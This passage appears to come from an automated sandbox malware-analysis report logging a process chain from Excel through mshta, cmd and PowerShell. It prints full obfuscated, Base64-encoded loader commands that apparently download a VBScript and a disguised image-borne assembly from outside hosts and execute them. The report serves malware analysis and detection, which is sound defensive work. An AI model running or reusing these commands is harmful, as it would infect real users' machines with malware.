mVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE734.tmp" "c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES367B.tmp" "c:\Users\user\AppData\Local\Temp\u10solcd\CSCB37CF81CE4334084B75C7031C6A4882F.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE734.tmp" "c:\Users\user\AppData\Local\Temp\1dk2y04d\CSCA659ECAEC3554F2F90108FC5834CA54.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR